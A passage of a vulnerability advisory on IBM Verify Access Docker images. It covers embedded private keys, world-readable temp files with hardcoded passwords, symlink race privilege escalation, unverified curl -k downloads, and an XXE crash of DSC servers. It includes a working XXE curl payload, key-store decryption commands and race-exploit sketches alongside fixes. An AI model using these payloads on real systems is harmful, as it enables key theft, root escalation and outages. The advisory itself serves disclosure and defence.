friendlyName: CN=DigiCert Global Root CA,OU=www.digicert.com,O=DigiCert Inc,C=US
localKeyID: 03 82 01 01 00 CB 9C 37 AA 48 13 12 0A FA DD 44 9C 4F 52 B0 F4 DF AE 04 F5 79 79 08 A3 24 18 FC 4B 2B 84 C0 2D B9 D5 C7 FE F4 C1 1F 58 CB B8 6D 9C 7A 74 E7 98 29 AB 11 B5 E3 70 A0 A1 CD 4C 88 99 93 8C 91 70 E2 AB 0F 1C BE 93 A9 FF 63 D5 E4 07 60 D3 A3 BF 9D 5B 09 F1 D5 8E E3 53 F4 8E 63 FA 3F A7 DB B4 66 DF 62 66 D6 D1 6E 41 8D F2 2D B5 EA 77 4A 9F 9D 58 E2 2B 59 C0 40 23 ED 2D 28 82 45 3E 79 54 92 26 98 E0 80 48 A8 37 EF F0 D6 79 60 16 DE AC E8 0E CD 6E AC 44 17 38 2F 49 DA E1 45 3E 2A B9 36 53 CF 3A 50 06 F7 2E E8 C4 57 49 6C 61 21 18 D5 04 AD 78 3C 2C 3A 80 6B A7 EB AF 15 14 E9 D8 89 C1 B9 38 6C E2 91 6C 8A FF 64 B9 77 25 57 30 C0 1B 24 A3 E1 DC E9 DF 47 7C B5 B4 24 08 05 30 EC 2D BD 0B BF 45 BF 50 B9 A9 F3 EB 98 01 12 AD C8 88 C6 98 34 5F 8D 0A 3C C6 E9 D5 95 95 6D DE
2.16.840.1.113894.746875.1.1: <Unsupported tag 6>
subject=C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert Global Root CA
issuer=C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert Global Root CA
-----BEGIN CERTIFICATE-----
MIIDrzCCApegAwIBAgIQCDvgVpBCRrGhdWrJWZHHSjANBgkqhkiG9w0BAQUFADBh
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
d3cuZGlnaWNlcnQuY29tMSAwHgYDVQQDExdEaWdpQ2VydCBHbG9iYWwgUm9vdCBD
QTAeFw0wNjExMTAwMDAwMDBaFw0zMTExMTAwMDAwMDBaMGExCzAJBgNVBAYTAlVT
MRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5j
b20xIDAeBgNVBAMTF0RpZ2lDZXJ0IEdsb2JhbCBSb290IENBMIIBIjANBgkqhkiG
9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4jvhEXLeqKTTo1eqUKKPC3eQyaKl7hLOllsB
CSDMAZOnTjC3U/dDxGkAV53ijSLdhwZAAIEJzs4bg7/fzTtxRuLWZscFs3YnFo97
nh6Vfe63SKMI2tavegw5BmV/Sl0fvBf4q77uKNd0f3p4mVmFaG5cIzJLv07A6Fpt
43C/dxC//AH2hdmoRBBYMql1GNXRor5H4idq9Joz+EkIYIvUX7Q6hL+hqkpMfT7P
T19sdl6gSzeRntwi5m3OFBqOasv+zbMUZBfHWymeMr/y7vrTC0LUq7dBMtoM1O/4
gdW7jVg/tRvoSSiicNoxBN33shbyTApOB6jtSj1etX+jkMOvJwIDAQABo2MwYTAO
BgNVHQ8BAf8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUA95QNVbR
TLtm8KPiGxvDl7I90VUwHwYDVR0jBBgwFoAUA95QNVbRTLtm8KPiGxvDl7I90VUw
DQYJKoZIhvcNAQEFBQADggEBAMucN6pIExIK+t1EnE9SsPTfrgT1eXkIoyQY/Esr
hMAtudXH/vTBH1jLuG2cenTnmCmrEbXjcKChzUyImZOMkXDiqw8cvpOp/2PV5Adg
06O/nVsJ8dWO41P0jmP6P6fbtGbfYmbW0W5BjfIttep3Sp+dWOIrWcBAI+0tKIJF
PnlUkiaY4IBIqDfv8NZ5YBberOgOzW6sRBc4L0na4UU+Krk2U886UAb3LujEV0ls
YSEY1QSteDwsOoBrp+uvFRTp2InBuThs4pFsiv9kuXclVzDAGySj4dzp30d8tbQk
CAUw7C29C79Fv1C5qfPrmAESrciIxpg0X40KPMbp1ZWVbd4=
-----END CERTIFICATE-----
Certificate bag
Bag Attributes
friendlyName: CN=DigiCert ECC Secure Server CA,O=DigiCert Inc,C=US
[...]
When auditing live installations, the decrypted lmi_trust_store.p12 file contains the private key of the isam CA:
kali% openssl x509 -in crt.pem -text -noout -modulus
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 14004578023842938
Signature Algorithm: sha256WithRSAEncryption
Issuer: C = us, O = ibm, CN = isam
Validity
Not Before: Sep 19 07:01:51 2022 GMT
Not After : Sep 17 07:01:51 2032 GMT
Subject: C = us, O = ibm, CN = isam
[...]
Modulus=C8B3[REDACTED]
kali% openssl rsa -in crt.key -modulus
Enter pass phrase for crt.key:
Modulus=C8B3[REDACTED]
writing RSA key
-----BEGIN PRIVATE KEY-----
[REDACTED]
-----END PRIVATE KEY-----
It is also possible to decrypt the embedded_ldap_keys.p12 file:
kali-docker# openssl pkcs12 -in embedded_ldap_keys.p12 -info -passin pass:passwordpassword
MAC: sha1, Iteration 1024
MAC length: 20, salt length: 8
PKCS7 Data
Shrouded Keybag: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 5
Bag Attributes
friendlyName: server
localKeyID: [REDACTED]
Key Attributes: <No Attributes>
Enter PEM pass phrase: [password]
Verifying - Enter PEM pass phrase: [password]
-----BEGIN ENCRYPTED PRIVATE KEY-----
[REDACTED]
-----END ENCRYPTED PRIVATE KEY-----
PKCS7 Encrypted data: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 1024
Certificate bag
Bag Attributes
friendlyName: server
localKeyID: [REDACTED]
subject=C = us, O = ibm, CN = isam
issuer=C = us, O = ibm, CN = isam
-----BEGIN CERTIFICATE-----
[REDACTED]
-----END CERTIFICATE-----
kali-docker#
Using dynamic analysis, it was confirmed that several private keys are included in the snapshot images and used at least by OpenLDAP. The .p12 files can be decrypted using IBM Crypto For C and OpenSSL.
kali-docker# pwd
/home/user/snapshots/_a22547c15c88-verify-access-runtime_10.0.4.0.tar-default.snapshot/var/pdweb/shared/keytab
kali-docker# ls -la
total 492
drwxr-x--- 2 root root 4096 Oct 18 05:13 .
drwxr-x--- 16 root root 4096 Sep 20 03:01 ..
-rw-r----- 1 root root 2952 Sep 20 03:01 embedded_ldap_keys.p12
-rw-r----- 1 root root 193 Jun 8 01:31 embedded_ldap_keys.sth
-rw-r----- 1 root root 47630 Sep 20 03:09 lmi_trust_store.p12
-rw-r----- 1 root root 193 Jun 8 01:31 lmi_trust_store.sth
-rw-r----- 1 root root 109313 Sep 20 03:17 rt_profile_keys.p12
-rw-r----- 1 root root 193 Jun 8 01:31 rt_profile_keys.sth
[...]
Details - Incorrect permissions in verify-access-dsc (race condition and leak of private key)
It was observed that the Docker image verify-access-dsc uses insecure temporary files to store sensitive information.
The /usr/sbin/bootstrap.sh script will generate temporary files using the default umask (022).
In the build_health_check_config() function found inside the /usr/sbin/bootstrap.sh script (executed when the instance starts), we can see that several files are generated:
- /tmp/health_check.p12
- /var/dsc/.health/port.txt
Content of /usr/sbin/bootstrap.sh:
[code:shell]
65 #############################################################################
66 # Construct the health check configuration information. This will include
67 # the port and client certificate information.
68
69 build_health_check_config()
70 {
71 if [ -z "$INSTANCE" ] ; then
72 INSTANCE=1
73 fi
74
75 conf=/var/dsc/etc/dsc.conf.${INSTANCE}
76
77 if [ ! -f ${conf} ] ; then
78 Echo 973 "${INSTANCE}"
79 exit 1
80 fi
81
82 #
83 # Determine the port which is to be used.
84 #
85
86     port=`/opt/PolicyDirector/sbin/pdconf -f $conf getentry \
87         dsess-server ssl-listen-port`
88
89 mkdir -p /var/dsc/.health
90
91 echo $port > /var/dsc/.health/port.txt
92
93 #
94 # Extract the client certificate which is used to communicate with the
95 # server.
96 #
97
98 cert_file=/var/dsc/.health/health_check.pem
99
100 tmp_p12=/tmp/health_check.p12
101 tmp_pwd=health_check
102
103 # Work out the name of the key file which is being used.
104     key_file=`/opt/PolicyDirector/sbin/pdconf -f $conf getentry \
105         dsess-server ssl-keyfile`
106
107 # Export the key into a key database type which is supported
108 # by OpenSSL.
109 gsk8capicmd_64 -cert -export -db $key_file -stashed \
110 -target $tmp_p12 -target_pw $tmp_pwd
111
112 # Convert the key into something that curl understands.
113 openssl pkcs12 -in $tmp_p12 -out $cert_file -nodes \
114 -passin pass:$tmp_pwd 2>/dev/null
115
116 # Tidy up.
117 rm -f $tmp_p12
118 }
119
[...]
176 #
177 # Extract the health check information.
178 #
179
180 build_health_check_config
[/code]
The temporary file /tmp/health_check.p12 contains the private keys of the dsc server and the dsc client. This key file is stored with 644 permissions, allowing any local attacker to extract these keys when the Docker image starts.
Furthermore, the password of the certificate file is hardcoded (to health_check, on line 101).
When checking the files generated by this script, we can confirm the files are world-readable. For example, for the /var/dsc/.health/port.txt file, the permissions are 644:
[isam@verify-access-dsc /]$ ls -la /var/dsc/.health/
total 28
drwxr-xr-x 2 isam isam 4096 Oct 4 09:07 .
drwxrwx--- 1 isam root 4096 Oct 4 09:07 ..
-rw------- 1 isam isam 9268 Oct 4 09:07 health_check.pem
-rw-r--r-- 1 isam isam 5 Oct 4 09:07 port.txt
[isam@verify-access-dsc /]$
There is a race condition in the /usr/sbin/bootstrap.sh script allowing a local attacker with access to the verify-access-dsc instance to extract the private keys of the dsc server and the dsc client when the Docker image starts.
The filename is predictable, allowing a local attacker to create the destination file before the script runs. Its content will be overwritten by the /usr/sbin/bootstrap.sh script, but the file will still be owned by the attacker, allowing extraction of the private keys.
The password is hardcoded.
Insecure permissions are used for sensitive files.
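The pre-creation attack described above can be sketched as follows (this sketch assumes the exporter writes into the existing inode rather than replacing the path, which is plausible but was not verified against gsk8capicmd_64):

```shell
# Run as the unprivileged attacker BEFORE bootstrap.sh executes: claim the
# predictable path. When root later exports the key into this file, the
# inode keeps the attacker's ownership, so the attacker can read the key.
touch /tmp/health_check.p12
ls -l /tmp/health_check.p12   # owned by the attacker, not root
```

To survive the script's final `rm -f`, the attacker can additionally keep an open descriptor on the file (`exec 3< /tmp/health_check.p12`) and read the key material through it afterwards.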
Details - Insecure health_check.sh script in verify-access (race condition and leak of private key)
It was observed that the Docker image verify-access regularly runs the script /usr/sbin/health_check.sh.
This script uses a temporary file to store sensitive information. Since it uses the default umask (022), an attacker can exploit a race condition (between lines 91 and 95) to extract the private keys of the dsc server and the dsc clients.
The /tmp/health_check.pem output file will also be created containing the private keys in clear-text (on line 91), allowing an attacker to extract these private keys:
Content of /usr/sbin/health_check.sh:
[code:shell]
[...]
65 cert_file=/tmp/health_check.pem
66
67 trap "rm -f $result_file $error_file $hdr_file" EXIT
68
69 # The following function will extract a key which can be used to authenticate
70 # to the DSC.
71
72 extract_dsc_key()
73 {
74 if [ ! -f $cert_file ] ; then
75 tmp_p12=/tmp/health_check.p12.$$
76 tmp_pwd=health_check
77
78 # Work out the name of the DSC configuration file.
79         conf_file=`mesa_config wga.ftype dir dsc.conf -production`
80
81 # Work out the name of the key file which is being used.
82         key_file=`/opt/PolicyDirector/sbin/pdconf -f $conf_file getentry \
83             dsess-server ssl-keyfile`
84
85 # Export the key into a key database type which is supported
86 # by OpenSSL.
87 gsk8capicmd_64 -cert -export -db $key_file -stashed \
88 -target $tmp_p12 -target_pw $tmp_pwd
89
90 # Convert the key into something that curl understands.
91 openssl pkcs12 -in $tmp_p12 -out $cert_file -nodes \
92 -passin pass:$tmp_pwd 2>/dev/null
93
94 # Tidy up.
95 rm -f $tmp_p12
96 fi
97 }
[...]
[/code]
The file /tmp/health_check.p12.$$ ($$ corresponding to the local PID) will be generated with the password health_check and will contain the private keys of the dsc client and the dsc server. This file will be world-readable. Then the file will be erased.
There is a race condition in the /usr/sbin/health_check.sh script allowing a local attacker with access to the verify-access instance to extract the private keys of the dsc server and the dsc client.
The filename is predictable, allowing a local attacker to create the destination file before the execution of the script. The content of the destination file will be overwritten by the /usr/sbin/health_check.sh script, but the file will still be owned by the attacker, allowing the private keys to be extracted.
There is also a leak of private keys in the world-readable file /tmp/health_check.pem.
The password is hardcoded.
Insecure permissions are used for sensitive files.
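The permissions issue can be reproduced outside the product. A minimal sketch (plain shell plus GNU stat, not the actual script): under the default umask of 022, a file created by redirection is world-readable, while mktemp would avoid both the predictable name and the loose permissions:

```shell
#!/bin/sh
# Illustration only - hypothetical paths, not the real health_check.sh.

# With the default umask, a redirection-created file is mode 644,
# i.e. readable by every local user.
umask 022
tmpdir=$(mktemp -d)
echo "dummy-key-material" > "$tmpdir/health_check.pem"
stat -c '%a' "$tmpdir/health_check.pem"    # prints 644

# mktemp creates the file atomically, with an unpredictable name and
# mode 600, closing both the race and the world-readable leak.
cert_file=$(mktemp "$tmpdir/health_check.XXXXXX")
stat -c '%a' "$cert_file"                  # prints 600

rm -rf "$tmpdir"
```

Using mktemp for $cert_file and $tmp_p12 would remove both the predictable filenames and the clear-text exposure window described above.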
Details - Local Privilege Escalation due to insecure health_check.sh script in verify-access (insecure SSL, insecure files)
It was observed that the Docker image verify-access regularly runs the script /usr/sbin/health_check.sh.
This script uses curl, without checking the remote SSL certificate:
Content of /usr/sbin/health_check.sh:
[code:shell]
190 #
191 # Make the curl request.
192 #
193
194 eval curl --insecure --output $result_file --silent --show-error \
195 -D $hdr_file $extra_args https://127.0.0.1:$port 2> $error_file
196
[/code]
The eval instruction does not seem exploitable.
This script uses 2 temporary files to store the standard output (stdout) and the error output (stderr) of the curl command: an attacker can exploit these 2 temporary files to overwrite any file in the filesystem using pre-generated symbolic links inside /tmp:
Content of /usr/sbin/health_check.sh:
[code:shell]
62 result_file=/tmp/health_check.out.$$
63 error_file=/tmp/health_check.err.$$
[...]
194 eval curl --insecure --output $result_file --silent --show-error \
195 -D $hdr_file $extra_args https://127.0.0.1:$port 2> $error_file
[/code]
The /tmp/health_check.out.$$ file ($$ corresponding to the local PID) can be a symbolic link generated by a local attacker - the content of the linked file will be overwritten as root.
The /tmp/health_check.err.$$ file ($$ corresponding to the local PID) can be a symbolic link generated by a local attacker - the content of the linked file will be overwritten as root.
The script trusts any insecure HTTPS server, due to the use of the --insecure flag in curl.
There are two uses of insecure files in the /usr/sbin/health_check.sh script allowing a local attacker with access to the verify-access instance to overwrite any file as root - it is possible to get a Local Privilege Escalation as root.
The filenames are predictable, allowing a local attacker to create potential destination files before the execution of the script. The content of the destination files will be overwritten by the /usr/sbin/health_check.sh script.
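The overwrite primitive described above can be sketched with ordinary shell commands (illustrative paths and a hard-coded PID, not the actual exploit):

```shell
#!/bin/sh
# Illustration only - the paths and the PID suffix are hypothetical.
tmpdir=$(mktemp -d)
echo "original content" > "$tmpdir/victim"

# Attacker: pre-create the predictable temp filename as a symlink
# pointing at a file the attacker wants overwritten.
ln -s "$tmpdir/victim" "$tmpdir/health_check.out.1234"

# Privileged script: redirects its output to the predictable name;
# the redirection follows the symlink.
echo "overwritten" > "$tmpdir/health_check.out.1234"

cat "$tmpdir/victim"    # prints: overwritten
rm -rf "$tmpdir"
```

When the writer runs as root, the same primitive corrupts arbitrary files on the host, which is what makes the predictable /tmp names exploitable.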
Details - Local Privilege Escalation due to insecure health_check.sh script in verify-access-dsc (insecure SSL, insecure file)
It was observed that the Docker image verify-access-dsc regularly runs the script /usr/sbin/health_check.sh.
This script uses a temporary file to store errors: an attacker can exploit a race condition to overwrite any file in the filesystem using a pre-generated symbolic link.
Furthermore, the script uses insecure options for curl on line 73 (--insecure) - the SSL certificate of the remote host will not be validated:
Content of /usr/sbin/health_check.sh:
[code:shell]
62 #
63 # Test access to the server as this will govern whether we are healthy or
64 # not.
65 #
66
67 error_file=/tmp/health_check.err.$$
68
69 trap "rm -f $error_file" EXIT
70
71 ping_body='0'
72
73 curl -s -o /dev/null --show-error --insecure --cert $cert_file -X POST \
74 -H 'SOAPAction: "ping"' \
75 --data "$ping_body" \
76 https://127.0.0.1:$port 2> $error_file
77
78 if [ $? -ne 0 ] ; then
79 #
80 # We don't know for sure yet whether the DSC is alive or not because it
81 # could be passive (only a single DSC is active in an environment at any
82 # one time). So, we also need to try a simple SSL connection before we
83 # return that the server is actually unhealthy. We could have simply
84 # avoided the initial curl call, but by only performing the SSL connection
85 # test when the DSC is passive we avoid SSL error messages being displayed
86 # on the console.
87 #
88
89 openssl s_client -connect 127.0.0.1:$port 2>&1 | grep -q CONNECTED
90
91 if [ $? -eq 0 ] ; then
92 exit 0
93 fi
94
95 echo "Error> failed to connect to the service."
96
97 cat $error_file; rm -f $cert_file
[/code]
The /tmp/health_check.err.$$ file ($$ corresponding to the local PID) can be a symbolic link that will be followed in the line 76. This allows an attacker to overwrite any file on the system because curl is executed as root.
There is a race condition in the /usr/sbin/health_check.sh script allowing a local attacker to overwrite any file as root on the instance - it is possible to get a Local Privilege Escalation as root.
The filename is predictable, allowing a local attacker to create potential destination files. The content of the destination file will be overwritten by the stderr file descriptor of the curl command.
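One mitigation sketch (an assumption on our part, not a vendor fix): besides switching to mktemp, enabling the shell's noclobber option makes a plain `>` redirection refuse pre-existing paths, including pre-created symlinks, because the file is opened with O_EXCL:

```shell
#!/bin/sh
# Illustration only - hypothetical paths.
tmpdir=$(mktemp -d)
echo "secret" > "$tmpdir/victim"

# Attacker pre-creates the predictable error-file name as a symlink.
ln -s "$tmpdir/victim" "$tmpdir/health_check.err.42"

# With noclobber (set -C), the redirection fails instead of following
# the symlink and overwriting the victim file.
( set -C; echo "clobber" > "$tmpdir/health_check.err.42" ) 2>/dev/null \
    || echo "write refused"

cat "$tmpdir/victim"    # still prints: secret
rm -rf "$tmpdir"
```

mktemp remains the more robust fix, since noclobber also rejects legitimate leftover files; either approach removes the symlink-following primitive.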
Details - Remote Code Execution due to insecure download of snapshot in verify-access-dsc, verify-access-runtime and verify-access-wrp
It was observed that the Docker images verify-access-dsc, verify-access-runtime and verify-access-wrp are able to download the snapshot file over HTTPS without checking the SSL certificate of the remote server, allowing an attacker to MITM the connection and retrieve the snapshot file or to provide a malicious snapshot file to the system.
The /usr/sbin/.bootstrap_common.sh script is executed from the /usr/sbin/bootstrap.sh script when the instance starts:
Content of /usr/sbin/bootstrap.sh in verify-access-dsc
[code:shell]
139 #
140 # Wait for the snapshot file.
141 #
142
143 wait_for_snapshot
[/code]
In verify-access-runtime, the function wait_for_snapshot() is called on line 93 inside the /usr/sbin/bootstrap.sh script.
The function wait_for_snapshot() calls the function download_from_cfgsvc() (line 251):
Content of /usr/sbin/.bootstrap_common.sh in verify-access-dsc, verify-access-runtime and verify-access-wrp:
[code:shell]
240 #############################################################################
241 # Wait for the snapshot file.
242
243 wait_for_snapshot()
244 {
245 download_from_cfgsvc 1
246
247 if [ ! -f $snapshot ] ; then
248 Echo 969
249
250 while [ ! -f $snapshot ] ; do
251 download_from_cfgsvc 0
252
253 if [ ! -f $snapshot ] ; then
254 sleep 1
255 fi
256 done
257
258 Echo 970
259 fi
260 }
[/code]
And the function download_from_cfgsvc() uses curl to download a snapshot, without checking the SSL certificate of the remote server. The -k option (also known as --insecure) disables any SSL verification (line 154):
Content of /usr/sbin/.bootstrap_common.sh in verify-access-dsc, verify-access-runtime and verify-access-wrp:
[code:shell]
140 download_from_cfgsvc()
141 {
142 # No need to download the snapshot if the configuration service has not
143 # been defined.
144 if [ -z "$CONFIG_SERVICE_URL" ] ; then
145 return
146 fi
147
148 if [ $1 -eq 1 ] ; then
149 Echo 960
150 fi
151
152 snapshotUri="`basename $snapshot`?type=File&client=`cat /etc/hostname`"
153
154 curl -k -s --fail -u "$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD" \
155 "$CONFIG_SERVICE_URL/snapshots/$snapshotUri" \
156 -o $snapshot
157
158 if [ $? -ne 0 ] ; then
159 if [ $1 -eq 1 ] ; then
160 Echo 961
161 fi
162
163 rm -f $snapshot
164 else
165 Echo 962
166 fi
167 }
[/code]
- From the curl(1) man page:
-k, --insecure (TLS) By default, every SSL connection curl makes is verified to be secure. This option allows curl to proceed and operate even for server connections otherwise considered insecure. The server connection is verified by making sure the server's certificate contains the right name and verifies successfully using the cert store. See this online resource for further details: https://curl.haxx.se/docs/sslcerts.html See also --proxy-insecure and --cacert.
The same issue exists with the function download_fixpacks() in the same shell script (line 201):
Content of /usr/sbin/.bootstrap_common.sh in verify-access-dsc, verify-access-runtime and verify-access-wrp:
[code:shell]
169 #############################################################################
170 # Attempt to download any requested fixpacks from the configuration service.
171
172 download_fixpacks()
173 {
174 # No need to download the fixpacks if the configuration service has not
175 # been defined.
176 if [ -z "$CONFIG_SERVICE_URL" ] ; then
177 return
178 fi
179
180 # No need to download the fixpacks if no fixpack has been specified, or
181 # if the fixpack has been set to 'disabled'.
182 if [ -z "${FIXPACKS}" -o "${FIXPACKS}" = "disabled" ]; then
183 return
184 fi
185
186 # Set the fixpack directory, and then ensure that the fixpack directory
187 # has been created.
188 fixpack_dir=/tmp/fixpacks
189
190 if [ -d $fixpack_dir ] ; then
191 rm -rf $fixpack_dir/*
192 else
193 mkdir -p $fixpack_dir
194 fi
195
196 # If we get this far we know that one or more fixpacks have been specified.
197 # We need to download each of these now.
198 for fixpack in $FIXPACKS; do
199 fixpackUri="$fixpack?type=File&client=`cat /etc/hostname`"
200
201 curl -k -s --fail \
202 -u "$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD" \
203 "$CONFIG_SERVICE_URL/fixpacks/$fixpackUri" \
204 -o $fixpack_dir/$fixpack
[/code]
The fixpacks will be then installed as root inside the image:
Content of /usr/sbin/.bootstrap_common.sh in verify-access-dsc, verify-access-runtime and verify-access-wrp:
[code:shell]
231 for fixpack in $FIXPACKS; do
232 Echo 967 "${fixpack}"
233 /usr/sbin/isva_install_fixpack -i ${fixpack_dir}/${fixpack} >/dev/null
234 if [ $? -ne 0 ]; then
235 Echo 968 "${fixpack}"
236 fi
[/code]
An attacker located on the network can inject a malicious snapshot file into the platform or MITM the connection to a server containing the snapshot image and take control over the entire platform.
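A hedged remediation sketch (the CA bundle path is an assumption, not taken from the product): pinning the configuration service's CA instead of passing -k lets curl verify the server before any snapshot is accepted.

[code:shell]
# Sketch only: same download as download_from_cfgsvc(), but verifying the
# server against a pinned CA bundle instead of using -k/--insecure.
# /etc/ssl/certs/config-service-ca.pem is a hypothetical path.
curl -s --fail \
    --cacert /etc/ssl/certs/config-service-ca.pem \
    -u "$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD" \
    "$CONFIG_SERVICE_URL/snapshots/$snapshotUri" \
    -o $snapshot
[/code]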
Details - Lack of authentication in Postgres inside verify-access-runtime
It was observed that the Docker image verify-access-runtime configures Postgres without authentication.
The /usr/sbin/bootstrap.sh script configures and starts the postgres daemon. We can see the lack of authentication:
[code:shell]
135 #
136 # Start the postgresql server.
137 #
138
139 Echo 974
140
141 db_root=/var/postgresql/config
142 db_data_root=$db_root/data
143 db_snapshot=$db_root/snapshot.sql
144 db_log_dir=/var/application.logs/db/config
145 db_port=5432
146 db_name=config
147 db_user=www-data
148
149 if [ ! -f $db_snapshot ] ; then
150 Echo 975
151 exit 1
152 fi
153
154 mkdir -p $db_log_dir
155
156 rm -rf $db_data_root
157
158 initdb -D $db_data_root --locale=C -U $db_user -A trust > /dev/null
159
160 pg_ctl -s -D $db_data_root -l $db_log_dir/logfile start
161
162 createdb -U $db_user -p $db_port -w $db_name > /dev/null
163
164 psql -U $db_user -p $db_port -f $db_snapshot -w -q $db_name > /dev/null
165
[/code]
A local attacker can compromise the postgres database.
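A hardened configuration sketch (the password-file path is an assumption, not from the product): initdb can be told to require password authentication instead of "trust", which blocks unauthenticated local connections.

[code:shell]
# Sketch only: generate a bootstrap password and require scram-sha-256
# authentication instead of -A trust. /var/postgresql/pwfile is a
# hypothetical path.
echo "some-generated-password" > /var/postgresql/pwfile
chmod 600 /var/postgresql/pwfile

initdb -D $db_data_root --locale=C -U $db_user \
    --pwfile=/var/postgresql/pwfile -A scram-sha-256 > /dev/null
[/code]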
Details - Null pointer dereference in dscd - Remote DoS against DSC instances
It was observed that the DSC (Distributed Session Cache) servers can be remotely crashed, resulting in a DoS of the authentication infrastructure.
The DSC servers are reachable using the /DSess/services/DSess API running on port 8443/tcp.
Using an SSL client certificate, it is possible to reach the remote DSC instances from the same network segment:
[user@container-01 ~]$ curl -kv https://dsc-02.test.lan:8443
* Rebuilt URL to: https://dsc-02.test.lan:8443/
* Trying 10.0.0.16...
* TCP_NODELAY set
* Connected to dsc-02.test.lan (10.0.0.16) port 8443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
* CAfile: /etc/pki/tls/certs/ca-bundle.crt
CApath: none
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Request CERT (13):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Certificate (11):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS alert, handshake failure (552):
* error:14094410:SSL routines:ssl3_read_bytes:sslv3 alert handshake failure
* Closing connection 0
curl: (35) error:14094410:SSL routines:ssl3_read_bytes:sslv3 alert handshake failure
With a client certificate, we can reach the /DSess/services/DSess API:
Sending a normal request (ping):
kali% curl --key dsc-client.key --cert dsc-client.pem --show-error --insecure https://dsc.test.lan:8443/DSess/services/DSess -X POST -H 'SOAPAction: "ping"' --data '<?xml version="1.0" encoding="utf-8" ?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Body><ns1:ping xmlns:ns1="http://sms.am.tivoli.com"><ns1:something>0</ns1:something></ns1:ping></SOAP-ENV:Body></SOAP-ENV:Envelope>'
<?xml version='1.0' encoding='utf-8' ?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
<ns1:pingResponse xmlns:ns1="http://sms.am.tivoli.com">
<ns1:pingReturn>952467756</ns1:pingReturn>
</ns1:pingResponse>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
We can also send a specific XML External Entity (XXE) that will crash the remote DSC instance:
kali% curl --key dsc-client.key --cert dsc-client.pem --show-error --insecure https://dsc-02.test.lan:8443/DSess/services/DSess -X POST -H 'SOAPAction: "ping"' --data '<?xml version="1.0" encoding="utf-8" ?><!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///dev/random">]><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Body><ns1:ping xmlns:ns1="http://sms.am.tivoli.com"><ns1:something>&xxe;</ns1:something></ns1:ping></SOAP-ENV:Body></SOAP-ENV:Envelope>'
curl: (52) Empty reply from server
When debugging this issue, it appears there is a null pointer dereference in the method DSessWrapper::ping(void*), defined in the /lib64/libamdsc_interface.so library:
[root@container-02]# ps -auxww | grep dscd
6000 2093037 3.4 0.5 427936 40884 ? Ssl 20:07 0:00 /opt/dsc/bin/dscd -c /var/dsc/etc/dsc.conf.1 -f -j
root 2093269 0.0 0.0 12140 1092 pts/0 S+ 20:07 0:00 grep --color=auto dscd
[root@container-02]# gdb -p 2093037
[...]
(gdb) c
Continuing.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x7fec38006110 --> 0x7fecaf4df160 --> 0x7fecaf280e20 --> 0x4100261081058b48
RCX: 0x7fec38000b60 --> 0x1000100030005
RDX: 0x7fec38025900 --> 0x7fec38021c90 --> 0x7fec38026230 --> 0x7fec38025dc0 --> 0x0
RSI: 0x4
RDI: 0x0
RBP: 0x7fec2804f7c0 --> 0x7fecb0297548 --> 0x7fecb0079560 --> 0x480021e921058b48
RSP: 0x7feca642fc10 --> 0x1d2e480 --> 0x7fecaf4dfbf8 --> 0x7fecaf292870 --> 0x410024f509058b48
RIP: 0x7fecb007a595 --> 0x48ffffca04e8188b
R8 : 0x7fec38000b74 --> 0x3000600060005
R9 : 0x4
R10: 0x2f ('/')
R11: 0x7fecaabb2674 --> 0x29058b48fb894853
R12: 0xffffffff
R13: 0x7feca642fca0 --> 0x7fec380312f0 ("/DSess/services/DSess")
R14: 0x7feca642fce0 --> 0x7feca642fcf0 --> 0x7f00676e6970
R15: 0x0
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7fecb007a58a <_ZN12DSessWrapper4pingEPv+154>: call QWORD PTR [rax+0x38]
0x7fecb007a58d <_ZN12DSessWrapper4pingEPv+157>: mov esi,0x4
0x7fecb007a592 <_ZN12DSessWrapper4pingEPv+162>: mov rdi,rax
=> 0x7fecb007a595 <_ZN12DSessWrapper4pingEPv+165>: mov ebx,DWORD PTR [rax]
0x7fecb007a597 <_ZN12DSessWrapper4pingEPv+167>: call 0x7fecb0076fa0 <_ZdlPvm@plt>
0x7fecb007a59c <_ZN12DSessWrapper4pingEPv+172>: mov rdi,QWORD PTR [rsp+0x18]
0x7fecb007a5a1 <_ZN12DSessWrapper4pingEPv+177>: mov rax,QWORD PTR [rdi]
